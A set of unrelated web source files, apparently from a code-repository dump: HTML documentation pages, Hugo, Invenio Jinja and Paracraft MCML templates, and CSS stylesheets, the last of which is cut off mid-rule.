href="schrodinger.application.licensing.licerror-module.html#IGNORE" >IGNORE</a><br /> <a target="mainFrame" href="schrodinger.application.licensing.licerror-module.html#WARNING" >WARNING</a><br /> <a target="mainFrame" href="schrodinger.application.licensing.licerror-module.html#__package__" >__package__</a><br /> <div class="private"> <a target="mainFrame" href="schrodinger.application.licensing.licerror-module.html#_errcode" >_errcode</a><br /> </div> <div class="private"> <a target="mainFrame" href="schrodinger.application.licensing.licerror-module.html#_errmsg" >_errmsg</a><br /> </div> <hr /> <span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
layouts/_default/single.html
xperimental/hugo-brunelleschi
{{ partial "header" . }} <div id="main" role="main" class="ninecol single"> {{ partial "top-nav" . }} {{ partial "post" . }} {{ partial "comments" . }} </div> {{ partial "sidebar" . }} {{ partial "footer" . }}
modules/websearch/etc/templates/websearch_results.html
EUDAT-B2SHARE/invenio-old
{# ## This file is part of Invenio. ## Copyright (C) 2012 CERN. ## ## Invenio is free software; you can redistribute it and/or ## modify it under the terms of the GNU General Public License as ## published by the Free Software Foundation; either version 2 of the ## License, or (at your option) any later version. ## ## Invenio is distributed in the hope that it will be useful, but ## WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with Invenio; if not, write to the Free Software Foundation, Inc., ## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. #} {% macro render_search_pagination(pagination) %} {%- set args = request.args.copy().to_dict() -%} {%- set form_args = request.form.copy().to_dict() -%} {%- if form_args|length() and 'filter' in form_args -%} {%- do form_args.pop('filter') -%} {%- do args.update(form_args) -%} {%- set hash_tag = '#'+request.form.get('filter','') -%} {%- else -%} {%- set hash_tag = '' -%} {%- endif -%} <div style="margin:0px;" class="pagination pull-right"> <ul> <li{{ ' class="disabled"'|safe if not pagination.has_prev }}> {%- do args.update({'jrec': 1}) -%} <a title="first" href="{{ url_for('search.search', **args)+hash_tag }}">«</a></li> <li{{ ' class="disabled"'|safe if not pagination.has_prev }}> {%- set jrec = (pagination.page-1)*pagination.per_page if pagination.has_prev else 1 -%} {%- do args.update({'jrec': jrec}) -%} <a title="prev" href="{{ url_for('search.search', **args)+hash_tag }}">&lsaquo;</a></li> {%- for page in pagination.iter_pages() %} {%- if page -%} <li{{ ' class="active"'|safe if page == pagination.page }}> {%- do args.update({'jrec': (page-1)*pagination.per_page+1}) -%} <a href="{{ url_for('search.search', **args)+hash_tag }}">{{ page }}</a> </li> {%- else -%} <li class="disabled"><a href="{{ hash_tag|default('#', true) }}">...</a></li> {%- endif -%} {%- endfor -%} <li{{ ' class="disabled"'|safe if not pagination.has_next }}> {%- set jrec = (pagination.page+1)*pagination.per_page if pagination.has_next else (pagination.pages-1)*pagination.per_page+1 -%} {%- do args.update({'jrec': jrec}) -%} <a href="{{ url_for('search.search', **args)+hash_tag }}">&rsaquo;</a></li> <li{{ ' class="disabled"'|safe if not pagination.has_next }}> {%- do args.update({'jrec': (pagination.pages-1)*pagination.per_page+1}) -%} <a title="last" href="{{ url_for('search.search', **args)+hash_tag }}">»</a> </li> </ul> </div> {% endmacro %} {% macro render_search_results(recids, collection, pagination, format_record) %} <form class="clearfix form-horizontal" name="" action="{{ url_for('search.dispatch') }}" method="post"> <span class="btn-group"> <span onclick="$('[name=recid]').prop('checked', function() {return !$(this).prop('checked')});" class="btn"> <i class="icon icon-check" rel="tooltip" title="{{ _('Toggle all') }}"></i> </span> {% if current_user.precached_usebaskets %} <button name="action" value="addtobasket" class="btn"> <i class="icon icon-bookmark" rel="tooltip" title="{{ _('Add to basket') }}"></i> <span style="display: none">{{ _('Add to basket') }}</span> </button> {% endif %} </span> <p class="help-inline hidden-phone"> {%- set r_from = (pagination.page-1)*pagination.per_page+1 -%} {%- set r_to = pagination.page*pagination.per_page -%} {%- set r_of = recids|length -%} {%- set r_to = r_to if r_to < r_of else r_of -%} {{ _('Showing records %d to %d out of %d results.') % (r_from, r_to, r_of) }} </p> <div class="btn-group pull-right"> <a class="btn dropdown-toggle" data-toggle="dropdown" href="#"> <i class="icon-random"></i> {{ _('Sort by') }} <span class="caret"></span> </a> {%- set args = request.values.copy().to_dict() -%} {%- set form_args = request.form.copy().to_dict() -%} {%- if form_args|length() and 'filter' in form_args -%} {%- do form_args.pop('filter') -%} {%- do args.update(form_args) -%} {%- endif -%} {%- set new_args = args.copy() -%} {%- if 'so' in new_args -%} {%- do new_args.pop('so') -%} {%- endif -%} {%- if 'rm' in new_args -%} {%- do new_args.pop('rm') -%} {%- endif -%} <ul class="dropdown-menu"> {%- for (k,v,vv) in [('Most recent', 'rm', ''), ('Most cited', 'rm', 'citation'), ('Most relevant', 'rm', 'wrd')] -%} {%- set active = request.values.get(v,'') == vv -%} {%- set used_args = new_args.copy() -%} {%- do used_args.update({v:vv}) -%} <li> <a href="{{ url_for('search.search', **used_args) }}{{ '#'+request.form.get('filter','')|default('', true) }}" class="{{ 'active' if active }}"> <i class="pull-right icon {{ ' icon-ok' if active }}"></i> {{ _(k) }} </a> </li> {%- endfor -%} {% if collection.rnkMETHODs|length %} <li class="divider"></li> {% for rnk_method in collection.rnkMETHODs %} {%- set used_args = new_args.copy() -%} {%- do used_args.update({'rm': rnk_method.rnkMETHOD.name }) -%} <li><a href="{{ url_for('search.search', **used_args) }}"> {{ rnk_method.rnkMETHOD.get_name_ln() }} </a></li> {% endfor %} {% endif %} </ul> </div> <div class="btn-group pull-right" style="margin-right: 5px;"> <a class="btn dropdown-toggle" data-toggle="dropdown" href="#"> <i class="icon-th"></i> {{ _('Display') }} <span class="caret"></span> </a> <ul class="dropdown-menu"> {%- for i in collection.formatoptions if i.content_type == 'text/html' and i.visibility == 1 -%} {%- set used_args = new_args.copy() -%} {%- do used_args.update({'of':i.code}) -%} <li><a href="{{ url_for('search.search', **used_args) }}{{ '#'+request.form.get('filter','')|default('', true) }}" class="{{ ' active' if active }}"> <i class="pull-right icon {{ ' icon-ok' if of==i.code }}"></i> {{ i.name }} </a></li> {%- endfor -%} <!-- dropdown menu links --> </ul> </div> <hr/> {%- for recid in recids[(pagination.page-1)*rg:pagination.page*rg] -%} {%- if of[0] == 'h' -%} <div class="row-fluid"> <div class="span1"> <label class="checkbox"> <input name="recid" type="checkbox" value="{{ recid }}" /> <abbr class="unapi-id" title="{{ recid }}"></abbr> {{ loop.index+(pagination.page-1)*rg }} </label> </div> <div class="span11"> {{ format_record(recid, of, ln=g.ln)|safe }} {{ '<hr/>'|safe if not loop.last }} </div> </div> {%- else -%} {{ format_record(recid, of, ln=g.ln) }} {%- endif -%} {%- endfor -%} <hr/> <div class="row clearfix"> <div class="span10"> <span class="pull-left btn-group clearfix"> <span onclick="$('[name=recid]').prop('checked', function() {return !$(this).prop('checked')});" class="btn"> <i class="icon icon-check" rel="tooltip" title="{{ _('Toggle all') }}"></i> </span> {% if current_user.precached_usebaskets %} <button name="action" value="addtobasket" class="btn"> <i class="icon icon-bookmark" rel="tooltip" title="{{ _('Add to basket') }}"></i> <span style="display: none">{{ _('Add to basket') }}</span> </button> {% endif %} </span> <span class="span4"> <select name="of" class="span2"> {%- for i in export_formats -%} <option value="{{ i.code }}"{{ ' selected' if request.args.get('of','hb')==i.code }}>{{ i.name }}</option> {%- endfor -%} </select> <button name="action" value="export" class="btn"> <i class="icon icon-download-alt" rel="tooltip" title="{{ _('Export') }}"></i> {{ _('Export') }} </button> </span> {{ render_search_pagination(pagination) }} </div> </div> </form> {% for category, msg in get_flashed_messages(with_categories=True, category_filter=['search-results-after']) %} {{ msg|safe }} {% endfor %} {% endmacro %} {% if not request.is_xhr %} {% extends 'page.html' %} {% block body %} {{ render_search_results(recids, collection, pagination, format_record) }} {% endblock %} {% else %} {{ render_search_results(recids, collection, pagination, format_record) }} {% endif %}
script/apps/Aries/Creator/Game/Tasks/ActRedhat/ActRedhatExchangeTip.html
NPLPackages/paracraft
<!-- "script/apps/Aries/Inventory/Pages/ActRedhatExchangeTip.html" --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <body> <pe:mcml> <script type="text/npl" src="ActRedhatExchangeTip.lua" refresh="true"><![CDATA[ local pageCtrl = document:GetPageCtrl(); local ActRedhatExchangeTip = NPL.load("script/apps/Aries/Creator/Game/Tasks/ActRedhat/ActRedhatExchangeTip.lua") local item_data = pageCtrl:GetRequestParam("item_data"); ActRedhatExchangeTip.OnInit(item_data) function OnCancel() pageCtrl:CloseWindow(); end function GetDesc() return ActRedhatExchangeTip.getTipsDesc() end function ClosePage() pageCtrl:CloseWindow(); end function getItemIcon() return ActRedhatExchangeTip.getItemIcon() end function onClickExchange() ActRedhatExchangeTip.onClickExchange() end ]]></script> <div style="width: 396px;height: 280px; background: url(Texture/Aries/Creator/keepwork/ActRedhat/tipbj_32bits.png#0 0 32 32:16 16 8 8);"> <div style="font-size: 16px; base-font-size: 16px;color: #ffffff; margin-top: 10px; margin-left: 10px;">爷爷的帽子</div> <input type="button" style="margin-left: 364; margin-top: -24px; width:20px;height:20px;background: url(Texture/Aries/Creator/keepwork/ActRedhat/tipX_19X20_32bits.png#0 0 20 20);" onclick="ClosePage()"/> <div style="position: relative;margin-top: 10px; margin-left: 150px;width: 114px;height: 114px; background: url(Texture/Aries/Creator/keepwork/ActRedhat/kuang2_114X144_32bits.png#0 0 114 114);"> <img src='<%=getItemIcon()%>' width="128" height="64" style="margin-top: 24px; margin-left: -10px;"/> </div> <div style="margin-left: 14px;margin-top: 130px;"> <div style="position:relative; margin-left: 18px; font-size: 12px; base-font-size: 12px; color: #ffffff;"> <%=GetDesc()%> </div> <input type="button" class="" value="下次再说" style="font-size: 16px ;base-font-size: 16px ; font-weight: bold;margin-left:30px;margin-top: 40px; width:108px;height:38px;background: url(Texture/Aries/Creator/keepwork/Window/button/btn_huise_32bits.png#0 0 38 64:16 16 16 16)" onclick="ClosePage()"/> <input type="button" class="" value="马上兑换" style="font-size: 16px ;base-font-size: 16px ; font-weight: bold;margin-left:230px;margin-top: -38px; width:108px;height:38px;background: url(Texture/Aries/Creator/keepwork/Window/button/btn_huangse_32bits.png#0 0 38 64:16 16 16 16)" onclick="onClickExchange()"/> </div> </div> </pe:mcml> </body> </html>
src/mpich-3.0.1/www/www3/MPI_Comm_get_name.html
qingu/WRF-Libraries
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML3.2 EN"> <HTML> <HEAD> <META NAME="GENERATOR" CONTENT="DOCTEXT"> <TITLE>MPI_Comm_get_name</TITLE> </HEAD> <BODY BGCOLOR="FFFFFF"> <A NAME="MPI_Comm_get_name"><H1>MPI_Comm_get_name</H1></A> Return the print name from the communicator <H2>Synopsis</H2> <PRE> int MPI_Comm_get_name(MPI_Comm comm, char *comm_name, int *resultlen) </PRE> <H2>Input Parameters</H2> <DL><DT><B>comm </B> <DD> Communicator to get name of (handle) </DL> <P> <H2>Output Parameters</H2> <DL> <DT><B>comm_name </B><DD>On output, contains the name of the communicator. It must be an array of size at least <TT>MPI_MAX_OBJECT_NAME</TT>. <DT><B>resultlen </B><DD>Number of characters in name </DL> <P> <H2>Notes</H2> <P> Because MPI specifies that null objects (e.g., <TT>MPI_COMM_NULL</TT>) are invalid as input to MPI routines unless otherwise specified, using <TT>MPI_COMM_NULL </TT>as input to this routine is an error. <P> <P> <H2>Thread and Interrupt Safety</H2> <P> This routine is thread and interrupt safe only if no MPI routine that updates or frees the same MPI object may be called concurrently with this routine. <P> The MPI standard defined a thread-safe interface but this does not mean that all routines may be called without any thread locks. For example, two threads must not attempt to change the contents of the same <TT>MPI_Info</TT> object concurrently. The user is responsible in this case for using some mechanism, such as thread locks, to ensure that only one thread at a time makes use of this routine. <P> <P> <H2>Notes for Fortran</H2> All MPI routines in Fortran (except for <TT>MPI_WTIME</TT> and <TT>MPI_WTICK</TT>) have an additional argument <TT>ierr</TT> at the end of the argument list. <TT>ierr </TT>is an integer and has the same meaning as the return value of the routine in C. In Fortran, MPI routines are subroutines, and are invoked with the <TT>call</TT> statement. <P> All MPI objects (e.g., <TT>MPI_Datatype</TT>, <TT>MPI_Comm</TT>) are of type <TT>INTEGER </TT>in Fortran. <P> <H2>Errors</H2> <P> All MPI routines (except <TT>MPI_Wtime</TT> and <TT>MPI_Wtick</TT>) return an error value; C routines as the value of the function and Fortran routines in the last argument. Before the value is returned, the current MPI error handler is called. By default, this error handler aborts the MPI job. The error handler may be changed with <TT>MPI_Comm_set_errhandler</TT> (for communicators), <TT>MPI_File_set_errhandler</TT> (for files), and <TT>MPI_Win_set_errhandler</TT> (for RMA windows). The MPI-1 routine <TT>MPI_Errhandler_set</TT> may be used but its use is deprecated. The predefined error handler <TT>MPI_ERRORS_RETURN</TT> may be used to cause error values to be returned. Note that MPI does <EM>not</EM> guarentee that an MPI program can continue past an error; however, MPI implementations will attempt to continue whenever possible. <P> <DL><DT><B>MPI_SUCCESS </B> <DD> No error; MPI routine completed successfully. </DL> <DL><DT><B>MPI_ERR_COMM </B> <DD> Invalid communicator. A common error is to use a null communicator in a call (not even allowed in <TT>MPI_Comm_rank</TT>). </DL> <P><B>Location:</B>src/mpi/comm/comm_get_name.c<P> </BODY></HTML>
share/static/css/elevator-light/assets.css
bestpractical/rt
#assets-accordion h3 a.unlink-asset { position: absolute; top: 0; right: 0; left: inherit; padding: 0; } .add-asset { padding-top: 10px; border-top: 1px solid #E0E6EC; }
skins/piano-black/style.css
Den1xxx/ReloadCMS
/* Theme Name:Piano Black Theme URI: Description:This theme supports widget, threaded-comments, theme-options,and translation is ready. Also including page-navigation and multi level dropdown menu.You can see live demo including more information here http://www.mono-lab.net/demo3/ Author:mono-lab Author URI:http://www.mono-lab.net Version:1.4 Tags: black, two-columns, fixed-width, theme-options, threaded-comments, translation-ready Adapted for ReloadCMS 128-x by MYST http://mznetwork.homelinux.org */ /* ------ basic ------------------- */ body { margin:0; padding:0; background:url(images/back1.gif); font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; font-size:12px; color:#b8babb;} a img { border:none; } a, a:visited { color:#7f8e91; text-decoration:none; outline:none; } a:hover { color:#81c8d5; text-decoration:underline; } p { margin:0 0 1em 0; padding:0; line-height:160%; } ul { list-style:none; margin:0 0 0 0; padding:0; line-height:0%; } ul li { margin:0; padding:0; line-height:normal; } h1, h2, h3 {} h1 { font-size: 13px;} h2 { color: white; font-size: 0.9em;} h3 { font-size: 12px;} form,table,dl,dt,dd { margin:0; padding:0;} input { padding: 2px 3px; margin:0; background-color: black; border:1px solid #333; color:#7f8e91; height:20px;} input:hover { background-color: #222;} textarea { width: 90%; background-color: black; border: 1px solid #333;color:#b8babb; overflow : auto !important; } table { border-collapse:collapse; border:0; width:100%; } blockquote { margin:0 0 1em 0; padding:15px 20px 0 20px; border:1px solid #333; background:#222; } blockquote a, blockquote a:visited { text-decoration:underline; } pre { border:1px solid #333; background:#222; padding:10px 20px; margin:0 0 1em 0; overflow:auto; } object { display:block; margin:0 auto; } hr { display: none;} abbr { border: 0; } div { outline: 0 none; } form { display: block; margin: 0;} fieldset { margin: 10px; } img { border:none;} th { color: white; background-color: transparent; padding: 1px; } td { font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; } .section { margin: 15px; font-size: 12px; position: relative; } #search-boxes { margin: 10px 30px; text-align: left; } #upload-img { padding: 5px 0 0 0; } .admin_mess { background-color: transparent; text-align: center; color: red;} .category { background-color: transparent; text-align: center; padding: 5px 0;} .grayborder {} .delbutton { color: red; } .editbutton {} .delform { float: right; } .editform { float: right; } .codetitle { margin: 10px 0 0 0; padding: 2px; border:1px solid #333; background-color: black; font-size: 8pt; overflow: auto !important; } .codetext { margin: 0; padding: 5px; border: black solid 1px; color: #b8babb; background-color: #222; font-size: 8pt; font-weight: normal; font-family: Arial, Consolas, "Segoe UI", Calibri; overflow: auto !important; white-space: nowrap; } .quotetitle { margin: 10px 0 10px 0; padding: 2px; border:1px solid #333; background-color: black; font-size: 8pt; overflow: auto !important;} .quotetext { margin: 0; padding: 5px; border: black solid 1px; color: #b8babb;border:1px solid #333; background-color: #222; font-size: 8pt; font-weight: normal; font-family: Arial, Consolas, "Segoe UI", Calibri; } .search-error { margin: 10px; text-align: center; color: red; } .search-link { margin: 10px; text-align: left; } .search-result { margin: 10px; text-align: justify; } .search-section { text-align: center; } .hidden { margin: 0px 5px 10px 5px; padding: 2px; border-color: Navy; border-width: 1px; border-style: dashed; color: #b8babb; font-weight: normal; font-size: 8pt; font-family: "Courier New", Courier, mono; background-color: #c4e6fa;overflow: auto; } div .back { text-align:left; } .nav { } .row1 { background-color: transparent; padding: 1px; } .row2 { background-color: transparent; padding: 1px 5px; } .row3 { background-color: transparent; padding: 1px 5px; } .row4 { background-color: transparent; padding: 1px 5px; } .row4 a { background-color: transparent; padding: 0; color: #ffffff; } .row2 ul { margin: 5px 0px; padding: 0; list-style-position: inside; } .row3 ul { margin: 5px 0px; padding: 0; list-style-position: inside; } .special { color: red ! important; } .content { padding:5px 0px; text-align:justify; } .paper { background: url(images/paper.gif); width: 80px; height: 81px; font-weight: bold; font-variant: small-caps; font-size: 12px; } .cat-item {} .cat-count { text-align: center; } /* Page layout classes ----------------------------- */ /* ------ layout ------------------------ */ #wrapper { background:url(images/back2.png) no-repeat center top; } #contents { width:959px; margin:0 auto; text-align:left; } #header { background:url(images/top.png) no-repeat bottom; height:160px; } #middle-contents { background:url(images/side.png) repeat-y; padding-bottom:50px; } #left-col { float:left; width:584px; margin:0 0 0 15px; } #right-col { float:right; display:block; width:330px; margin:30px 2px 0 0; } #footer { background:url(images/bottom.png) no-repeat top; height:114px; margin-bottom:50px; text-align:center; } /* ------ header ---------------------- */ /* site title */ #logo { float:left; display:inline; margin:64px 0 0 40px; } #logo a, #logo a:visited { color:#ccc; font-size:22px; } #logo a:hover { text-decoration:none; color:#83bac4; } #logo h1 { font-weight:normal; line-height:100%; margin:0; padding:6px 0; color:#666; font-size:11px; } #rss-feed { font-size:11px; float:right; margin:62px 15px 0 0; display:inline; color:#777; background:url(images/rss.gif) no-repeat left top; height:25px; width:80px; padding:18px 0 0 60px; } #rss-feed:hover { background:url(images/rss.gif) no-repeat left bottom; color:#83bac4; text-decoration:none; } /* ------ header-menu ------------------------ */ .header-navbox{ height:61px; } #pngfix-right { background:url(images/menu_right.png) no-repeat right top; display:block; width:10px; height:60px; float:right; } #pngfix-left { background:url(images/menu_left.png) no-repeat left top; display:block; width:10px; height:60px; float:right; } .menu_wrapper {float:right;width: 77%;height: 61px; vertical-align: top; font-size: 13px;background: url(images/menu_middle.png) repeat-x left top; line-height:1; margin:0; padding:0;} .menu {width: 100%;height: 40px;margin: 0 auto;padding: 0;line-height:1; } .menu ul {width: 100%;padding: 0;margin: 24px 0 0 0;list-style: none;} .menu ul li {position:relative; float:left; height:40px; padding:0 18px; z-index:100;} .menu ul li a {float: left; display: block; height: 25px;width: 80px;padding: 5px 5px 0 0;margin: 0; text-align: center;font-weight: normal;text-decoration: none;color:#888; } .menu li a:hover {color:#83bac4; border-bottom:2px solid #83bac4; text-decoration:none;} /*Ïî÷åìó íå ðàáîòàåò äèíàìè÷åñêîå ìåíþ? Åñëè ðàñêîìåíòèðîâàòü óêàçàííûå ñòðî÷êè âíèçó è çàêîììåíòèðîâàòü ââåðõó, äèíàìè÷åñêîå ìåíþ áóäåò ðàáîòàòü, è ñòàðûé è íîâûé ñòèëü, íî åñëè âû íå èñïîëüçóåòå êàê ÿ äèíàìè÷åñêîå ìåíþ, ïðè çàìåíå ñòðîê, è îòêëþ÷åíèè äèíàìèê-ìåíþ â àäìèíêå, âñå ïóíêòû ìåíþ ñúåäóò â êó÷ó, ýòî èç çà float: left. ß ïûòàëñÿ ÷òî-òî ñ ýòîèì ñäåëàòü, íî íå ïîëó÷èëîñü. Åñëè âû çíàåòå êàê ðåøèòü ïðîáëåìó Íàïèøèòå ìíå ñþäà: magicunit@yandex.ru Íå çàáóäüòå ïîìåíÿòü òàê-æå â forum.css */ /* .menu_wrapper {float:right;width: 77%;height: 61px; vertical-align: top; font-size: 13px;background: url(images/menu_middle.png) repeat-x left top; line-height:1; margin:0; padding:0;} .menu {width: 100%;height: 40px;margin: 0 auto;padding: 0; } .menu ul {width: 100%;margin: 20px 0 0 0;padding: 0;list-style: none;} .menu ul li {padding:0 0 0 2px; z-index:100; } .menu ul li a {height: 30px;font-weight: normal;text-decoration: none;color:#b8babb;} .menu li a:hover {color:#83bac4; border-bottom:2px solid #83bac4; text-decoration:none;} */ /* ------ left-col ------------- */ .post { margin:20px 0 5px 0; } /*åñëè êàðòà ñàéòà áîëüøàÿ èçìåíèòå ñëåäóþùèå 2 ñòðî÷êè*/ .post ul {padding:0 0 0 30px;} .post ul li {padding:0;} .post-content { clear:both; padding:15px 5px 20px 0; line-height:160%; } .post-content p { margin:0 0 1em 0; line-height:160%; } .post-content a,.post-content a:visited { text-decoration:none; } .post img, .post a img { border:none; padding:5px; margin:0; } .post table { margin:0 0 1em 0; } .post td, .post th { padding:5px; } .post th { background-color:#000; font-weight:normal; } .post-content input { margin:5px 0; } /* ------ right-col ------------- */ #information-title { background:url(images/info-box.gif) no-repeat left top; padding:25px 20px 5px 20px; width:232px; margin:0 0 0 30px; } #information-contents { height: auto;font-size:11px; color:#868a8d; background:url(images/info-boy.gif) no-repeat left bottom; padding:12px 20px 20px 20px; margin:0 0 20px 30px; width:232px; } .side-title { margin:0 0 20px 0; font-size:11px; text-transform:uppercase; color:#999; font-weight:normal; line-height:100%; } #side-top {} #side-box { color:#aaa; margin:0 10px 50px 18px; font-size:11px; width:270px; } #side-bottom { clear:both; } #copy-box { background:url(images/info-box.gif) no-repeat left top; padding:25px 20px 5px 20px; width:232px; margin:0 0 0 30px; } #copyrights { text-align:center; height: auto;font-size:11px; color:#868a8d; background:url(images/info-boy.gif) no-repeat left bottom; padding:12px 20px 20px 20px; margin:0 0 0 -20px; width:232px;} /* end */ #return_top a { position:absolute; position:fixed; right:0; bottom:15px; display:block; height:138px; width:38px; background:url(images/return-top.png) no-repeat left top; } #return_top a:hover { background:url(images/return-top.png) no-repeat right top; text-decoration:none; } /* ---------- clearfix hack ---------- */ .clearfix:after { content: "."; display: block; clear: both; height: 0; visibility: hidden; } .clearfix { display: inline-block; } /* exlude MacIE5 \*/ * html .clearfix { height: 1% } .clearfix {display:block;} /* end MacIE5 */ /* Main windows styles ----------------------------- */ .main-window-title { background: url(images/mwbg.gif) no-repeat right top; padding:20px 0 0 0; margin: 0; height: 40px; line-height: normal; color: #999999; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; font-size: 13px; text-transform:uppercase; text-align: left; text-indent:35px; } .window-title { width: 255px; height: 20px; padding: 13px 20px; color: #999999; font-size: 14px; text-transform: uppercase; font-weight: normal; text-decoration: none; text-align: left; } .window-main {font-size: 12px; text-decoration: none; margin: 5px 0px 10px 0; padding: 0 0 0 20px; background-color: transparent; text-align: left;} /* Dinamic menu ----------------------------- */ div.dhtml_menu div.vert_menu { position: absolute; visibility: hidden; z-index: 2; background: url(images/sub-back.png); font-size:12px;} /*first line*/ div.dhtml_menu div.horz_menu a { display: block; float: left; margin: 2px 0 0 15px; padding: 0 5px;} /*2-line*/ div.dhtml_menu div.vert_menu a { display: block; float: none; margin: 1px 2px; padding: 2px 5px;min-width: 80px;} div.dhtml_menu div.vert_menu { border:1px solid #222;} div.dhtml_menu div.horz_menu a, div.dhtml_menu div.vert_menu a { background-color: transparent; color: white; height: 20px; line-height: 20px; text-align: left; text-decoration: none; } div.dhtml_menu div.horz_menu a { height: 20px; line-height: 20px; } div.dhtml_menu div.vert_menu a { margin-bottom: 2px; min-width: 185px;} div.dhtml_menu div.horz_menu a:hover, div.dhtml_menu div.vert_menu a:hover { color: #81c8d5; } div.dhtml_menu div.horz_menu a.parent, div.dhtml_menu div.vert_menu a.parent { color: #b8babb; } div.dhtml_menu div.horz_menu a.parent { background-color: transparent; } div.dhtml_menu div.horz_menu a.active, div.dhtml_menu div.vert_menu a.active, div.dhtml_menu div.horz_menu a.active:hover, div.dhtml_menu div.vert_menu a.active:hover { color: #81c8d5; } /* Dinamic menu II ----------------------------- */ #dropline { position: relative; height: 30px; } #dropline, #dropline ul {display: block; padding: 2px; margin: 0; list-style: none; width: 100%;font-size: 12px; } #dropline table { border-collapse: collapse; margin: -1px -10px 0 0; padding: 0; width: 0; height: 0; } #dropline li { height: 30px; float: left; margin: 0 1px 0 0; padding: 2px;} #dropline li a { height: 30px; display: block; line-height: 30px;padding: 0 20px 2px 10px; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; font-size: 12px;text-decoration: none; font-weight: normal;} #dropline li a.down { background: url(images/down.gif) no-repeat right center; } #dropline li ul li a.down { font-size: 12px; color: #81c8d5; font-weight: normal; } #dropline li a:hover { white-space: nowrap;} #dropline li a.down:hover { white-space: nowrap; background: url(images/down-ove.gif) no-repeat right center;} #dropline li:hover > a { color: #81c8d5; padding-bottom:2px;} #dropline li:hover > a.down { color: #81c8d5; background: url(images/down-ove.gif) no-repeat right center; } /*2-line*/ #dropline li ul { position: absolute; margin: 35px -9999px 0 0; top: 35px; left: -9999px; z-index: 10; background: transparent; } #dropline li ul.floatRight li { float: right; } #dropline :hover ul, #dropline :hover ul :hover ul, #dropline :hover ul :hover ul :hover ul, #dropline :hover ul :hover ul :hover ul :hover ul, #dropline :hover ul :hover ul :hover ul :hover ul :hover ul { margin: 0; left: 0; background: url(images/sub-back.png) left bottom; z-index: 10; } /*3-line*/ #dropline :hover ul ul, #dropline :hover ul :hover ul ul, #dropline :hover ul :hover ul :hover ul ul, #dropline :hover ul :hover ul :hover ul :hover ul ul {margin: 30px -9999px 0 0; left: -9999px; top: 36px; background: transparent; z-index: 10; } /* Articles, messages, topics, replies ----------------------------- */ .article { background-color: transparent; margin: 0 0 5px 0; padding: 0 0 15px 0; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica;} .article .author { font-style: italic; text-align: left; color: white; vertical-align: bottom; position: relative; left: 5px; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica;} .article .date { position: relative; left: 8px; font-size: 12px; text-align: left; vertical-align: middle; height: 25px; } .article .last { background-color: transparent; text-align: left; top: 10px; padding: 10px 0; } .article .menu { text-align: right; vertical-align: bottom; padding: 5px 5px 0 5px; } .article .rate { top: 100px; } .article .text { padding: 0 5px 5px 5px; text-align: justify; font-size: 12px; vertical-align: top; width: 98%; position: relative;overflow: auto !important; } .article .title { background-color: transparent;font-size: 13px; padding: 10px 0; text-align: center; } .article-short { margin: 0 0 0 -15px;font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; } .article-short .author { font-style: italic; float: right; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica;} .article-short .icon { width: 8%; height:7%;float: left; margin: 0 2% 0 0; } .article-short .title { padding: 10px 0; text-align: left; font-size: 13px; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; } .article-short .text {padding: 0 5px 5px 0; text-align: justify; font-size: 12px; } .article-short .codetitle { margin: 5px 0; padding: 2px; } .article-short .codetext { padding: 5px;} .article-short .quotetitle { margin: 5px 0; padding: 2px; } .article-short .quotetext{ padding: 5px;} .gallery { background-color: transparent; padding: 5px;} .article .info { background-color: transparent; text-align: left; top: 10px; padding: 10px 0; } .gallery .rate { top: 100px; } .gallery .title { background-color: transparent; font-size: 13px; padding: 10px 0; text-align: center; } .gallery .title a { color: #7f8e91; text-decoration: none;} .gallery .title a:hover { color: #81c8d5; text-decoration: underline;} /*PM*/ .message { padding: 0; text-align: left; vertical-align: top; } .message .author { text-align: center; vertical-align: top; float: left; width: 120px; } .message .name { text-align: center; padding: 0 0 5px 0; } .message .date { text-align: left; padding: 2px 0 5px 5px; min-height: 20px; } .message .info { } .message .menu { text-align: right; padding: 5px; height: 30px; position: relative; top: -20px; } .message .text { text-align: justify; padding: 5px; min-height: 100px; background-color: transparent; overflow: auto !important; } .message .mctext { text-align: justify; padding: 5px; background-color: transparent; overflow: auto !important; } .message .codetitle { } .message .quotetitle { } /*Comments*/ .reply { text-align: left; vertical-align: top; } .reply .author { text-align: center; vertical-align: top; float: left; width: 120px; } .reply .name { text-align: center; padding: 0 0 6px 0; } .reply .date { text-align: left; padding: 2px 0 5px 5px; min-height: 20px; } .reply .info { } .reply .menu { text-align: right; padding: 5px; height: 20px; position: relative; top: -20px; } .reply .text { text-align: justify; padding: 5px; min-height: 100px; background-color: transparent; } .reply .mctext { text-align: justify; padding: 5px; background-color: transparent; } .reply .codetitle { } .catalog { padding: 10px 30px; } .catalog .title { margin: 10px; color: #7f8e91; } .catalog .title a { color: #7f8e91; text-decoration: none; font-size: 1.2em; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica;} .catalog .title a:hover { color: #81c8d5; text-decoration: underline;} .catalog .description { color: #7f8e91; font-weight: normal; font-size: 12px; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; text-align: left; } .catalog .content { text-align: left; } /* Forum ----------------------------- */ .topic { border: 0; min-height: 200px; } .topic .head { background-color: transparent; width: 100%; text-align: right; } .topic 